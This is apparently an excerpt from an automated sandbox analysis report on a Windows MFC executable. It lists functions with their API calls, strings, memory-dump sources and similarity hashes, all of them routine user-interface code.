Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4160#540#6199#800H_prolog
String ID:
API String ID: 3166701186-0
Opcode ID: 01d78a5b742eecf39d12362b125a01053dc67575be88033d4ecc53d65049381c
Instruction ID: 19393b35cb8eaa82ef8ac007b9a5b54f9826cf36f9be3c00c642ee5d1d14926f
Opcode Fuzzy Hash: 01d78a5b742eecf39d12362b125a01053dc67575be88033d4ecc53d65049381c
Instruction Fuzzy Hash: 7BE06D31A209359BCB09EB55D802AFEB370BF00318F91466FA022325E28FB85A04CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00401C35, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004102B6
#500.MFC42 ref: 004102E1
#772.MFC42(4B), ref: 00410371

Strings

4B, xrefs: 004102ED, 004102F2

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #500#772H_prolog
String ID: 4B
API String ID: 3510353011-455405905
Opcode ID: 9034889dd659b8eacac42d65ccf58fe8d9fd972a9593021053b440dde2c5b88a
Instruction ID: 35e0fb99cc74da4147189ffc784e0c4af8958bac0a8cac3bbb8c6bca56b6bc72
Opcode Fuzzy Hash: 9034889dd659b8eacac42d65ccf58fe8d9fd972a9593021053b440dde2c5b88a
Instruction Fuzzy Hash: 6A21E531A00619DBCB259B29C8466EFB7F1EB58314F50892BE963E3290D7B8D9C18B54

Uniqueness

Uniqueness Score: -1.00%

Function 00401AF5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408639
#303.MFC42(SysListView32,50800000), ref: 0040864F
#384.MFC42(SysListView32,50800000), ref: 00408670

Strings

SysListView32, xrefs: 00408647

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #303#384H_prolog
String ID: SysListView32
API String ID: 2093176266-78025650
Opcode ID: 2bbb4afa5c1fd6c135a337dfd1fda207fdeece27bcfbef03a9e638039954ab95
Instruction ID: 5ec88cf534386ce04bd24ec44494c99f52e8a964aa6ea4eabad691be1d52180a
Opcode Fuzzy Hash: 2bbb4afa5c1fd6c135a337dfd1fda207fdeece27bcfbef03a9e638039954ab95
Instruction Fuzzy Hash: 1BF0E570B11660DFC710EF50D505B9DB3A0EF10708F60885FA04263282EBFC5900CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040985C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00409861
#303.MFC42(SysListView32,50800000), ref: 00409877
#384.MFC42(SysListView32,50800000), ref: 00409898

Strings

SysListView32, xrefs: 0040986F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #303#384H_prolog
String ID: SysListView32
API String ID: 2093176266-78025650
Opcode ID: 795c1e598a3d37e55bab894c5296011011bb570d61abc15ca8c21f4709c2395e
Instruction ID: af3214608439a226723490ed1d1a0fabe70e35a5edd5d6e00751d5cfc77e3115
Opcode Fuzzy Hash: 795c1e598a3d37e55bab894c5296011011bb570d61abc15ca8c21f4709c2395e
Instruction Fuzzy Hash: 20E0E570B00A209FC310DF50D505B9DB3A0EF10708F50881FB04153282EBF85900CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA43, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

#3870.MFC42(?), ref: 0040CA50
#6401.MFC42(Settings,WindowPos,?,0000002C,?), ref: 0040CA6B

Strings

WindowPos, xrefs: 0040CA61
Settings, xrefs: 0040CA66

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3870#6401
String ID: Settings$WindowPos
API String ID: 2433839399-2307497440
Opcode ID: 9330a6b0c821abc08007f7fd686cf8e335ce45e0594a98d31d7acfd1ecabcbcf
Instruction ID: ac8cde7b0259db789605c78b0324c6a9667434bcf242229eb2570993a67df890
Opcode Fuzzy Hash: 9330a6b0c821abc08007f7fd686cf8e335ce45e0594a98d31d7acfd1ecabcbcf
Instruction Fuzzy Hash: B0D05E71A002186AEA00F2B9D947EDE76AC9B48B14F40401BEA01B2181E6E8B90087EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041CED7, Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

APIs

#825.MFC42(?), ref: 0041CEFB
#823.MFC42(?), ref: 0041CF1E
#823.MFC42(?), ref: 0041CFAC
#825.MFC42(?,?), ref: 0041CFF7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: 559a64f938ddab690c448c809d99a03b98f466a4befa018176fc64adfea1a5e1
Instruction ID: 33cfa6bb3c6d0c598fda230b74daadd7c12cbd2ef41edd1c8e63f40a327a674f
Opcode Fuzzy Hash: 559a64f938ddab690c448c809d99a03b98f466a4befa018176fc64adfea1a5e1
Instruction Fuzzy Hash: E441B2727005149BCF18CE29D8916AAB7D3EB88324B59C16EF909DF385CB38CD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004259A6, Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004259AB
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004259BD
#823.MFC42(00000018), ref: 004259C9
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 00425AE8

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockit@std@@$#823??0_??1_H_prolog
String ID:
API String ID: 3947041663-0
Opcode ID: 9c0b7be4fedf337bd016cdaf3cd44959079a0f5c484395bb51c3af7d9967b605
Instruction ID: 0f65ff2a9ec617cd25bd79520ebae26f5d71d5d0362d1b0f68e18de7cce6499a
Opcode Fuzzy Hash: 9c0b7be4fedf337bd016cdaf3cd44959079a0f5c484395bb51c3af7d9967b605
Instruction Fuzzy Hash: 16516874B00610CFCB14CF54E5C592ABBF1FF98304B65816AE8069B362D774EC01CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041B74F, Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

#825.MFC42(?), ref: 0041B773
#823.MFC42(?), ref: 0041B796
#823.MFC42(?), ref: 0041B813
#825.MFC42(?,?), ref: 0041B84F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction ID: ae0b5427874dae67b522faa3cf221574fdec97d68c2ab767598afe0a24d09ccf
Opcode Fuzzy Hash: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction Fuzzy Hash: 2941E232B00514DBCF18DE29C4815AAB7E6EB88760B59C06EE919DF385DB38DD41CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041B8EF, Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

#825.MFC42(?), ref: 0041B913
#823.MFC42(?), ref: 0041B936
#823.MFC42(?), ref: 0041B9B3
#825.MFC42(?,?), ref: 0041B9EF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction ID: 6db02841a47a871397b7cc7e11146c77fa91bf7c5704c44507dd7c964967d04f
Opcode Fuzzy Hash: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction Fuzzy Hash: 4841D1B27105149BCF18CE29C4816AAB7E6EB88360B59C06EEA4DDF345D738DD42CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA8F, Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

#825.MFC42(?), ref: 0041BAB3
#823.MFC42(?), ref: 0041BAD6
#823.MFC42(?), ref: 0041BB53
#825.MFC42(?,?), ref: 0041BB8F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction ID: f6e6ba9618f6ee0fa364f19bfb00e063be635833c91ecde9d4362c86c3345c0c
Opcode Fuzzy Hash: cba48d0ad07b07430775a6d8f14030ed4114a0bf6d6a75064b5912fb77e01f45
Instruction Fuzzy Hash: 1D41A072B041149BCF18CE29D4816AAB7E6EF88360B59C16EE909DF349DB38DD41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3D6, Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

#825.MFC42(?), ref: 0041D3FA
#823.MFC42(?), ref: 0041D41D
#823.MFC42(?), ref: 0041D48E
#825.MFC42(?,?,?), ref: 0041D4CE

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: 33516ba89fbdfc4753ca134a05159b3c828d6c78b418fa4631469c0889a7ae8e
Instruction ID: f57a12143ba35cd615fbdc5d9418eba5d37c9aa01496556d3ce096a8f7fc6caf
Opcode Fuzzy Hash: 33516ba89fbdfc4753ca134a05159b3c828d6c78b418fa4631469c0889a7ae8e
Instruction Fuzzy Hash: 0A31C2B1B00114ABCF14DF28D5816AAB7A4EF44364B54C06AF909DF346C678ED41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401852, Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00422724
#470.MFC42 ref: 00422734
GetClientRect.USER32 ref: 00422744
#755.MFC42(?,?), ref: 0042280A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #470#755ClientH_prologRect
String ID:
API String ID: 3868129451-0
Opcode ID: 32bf48bc42a6526c97ed6048d26b6a4c10d69179a8257abdb62c292a1290f8f3
Instruction ID: f5131e83bd3e547547af65da67a416683804489318ed7825b26b0acd17c7ffcb
Opcode Fuzzy Hash: 32bf48bc42a6526c97ed6048d26b6a4c10d69179a8257abdb62c292a1290f8f3
Instruction Fuzzy Hash: CC316D71A04519ABDB14DBA5D980DEFB7F8FB88304FA0412FE006E3251DB74AE41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00410399, Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

CopyRect.USER32 ref: 004103AA
#2380.MFC42(00000003,00000005,00000003,00000003), ref: 004103BB
#2380.MFC42(00000002,00000000,00000002,00000002,00000003,00000005,00000003,00000003), ref: 004103D4
#2380.MFC42(00000000,00000000,00000000,00000000), ref: 0041044D

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2380$CopyRect
String ID:
API String ID: 1388795460-0
Opcode ID: 9fefbae1d41b615c81d1dc20250fa85c172b49b67d6e10d4718904fb34becc7e
Instruction ID: 89ddb0dffe47ec530427cf0d4d0de4678e75f261b5002cddb3eccbd48819c011
Opcode Fuzzy Hash: 9fefbae1d41b615c81d1dc20250fa85c172b49b67d6e10d4718904fb34becc7e
Instruction Fuzzy Hash: FF21F830100A59DFD725CA14C85BBFB77A4FF40304F40880AEB6B6A1D2D6B8ADC6CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00423D5C, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

#4083.MFC42(0042F1E0), ref: 00423D82
#4083.MFC42(0042F2F8,0042F1E0), ref: 00423D9E
EnumChildWindows.USER32 ref: 00423DB3

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4083$ChildEnumWindows
String ID:
API String ID: 3938739222-0
Opcode ID: 0a998a1309ab25fb55c3beee7bf106f0d8c5928ba4531297b8fc86fb668477fa
Instruction ID: 0310a3ed69130c3f93745da556f83cb9fc7cd475494b8ba650b6512887852d00
Opcode Fuzzy Hash: 0a998a1309ab25fb55c3beee7bf106f0d8c5928ba4531297b8fc86fb668477fa
Instruction Fuzzy Hash: 1B11A335310220EFCB14DF95E881E6BB7B5EF85751B9044AAF50697650D778FE00CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040196F, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00421418
#823.MFC42(00000040), ref: 00421453
#567.MFC42 ref: 00421468
#2116.MFC42(?,50000001,00000000,?,0000FFFF), ref: 00421494

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2116#567#823H_prolog
String ID:
API String ID: 2817064219-0
Opcode ID: 4142fac23bbc2c8af7a2efa1c4b17c574b560b7ed67372f78cd3d1b7f8c4c6ff
Instruction ID: 293d1cd85fc47d11d58c33647b98396a6b20c697591b28e1f7e7035ec46fb3a6
Opcode Fuzzy Hash: 4142fac23bbc2c8af7a2efa1c4b17c574b560b7ed67372f78cd3d1b7f8c4c6ff
Instruction Fuzzy Hash: A1119471A00711AFD720DF18E40176AB7F1EB44325F50862FE95697691D7B895058B44

Uniqueness

Uniqueness Score: -1.00%

Function 004152DE, Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 004152F8
#1099.MFC42(?,?,00000001), ref: 00415311
lstrlenA.KERNEL32(?), ref: 00415322
#1099.MFC42(?,?,00000001), ref: 0041533B

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
